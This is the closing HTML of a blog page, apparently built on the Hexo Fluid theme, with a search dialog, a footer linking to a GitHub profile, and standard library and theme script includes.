      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <i class="iconfont icon-github-fill"></i> <a href="https://github.com/MelioD4rk" target="_blank" rel="nofollow noopener"><span>MelioD4rk</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
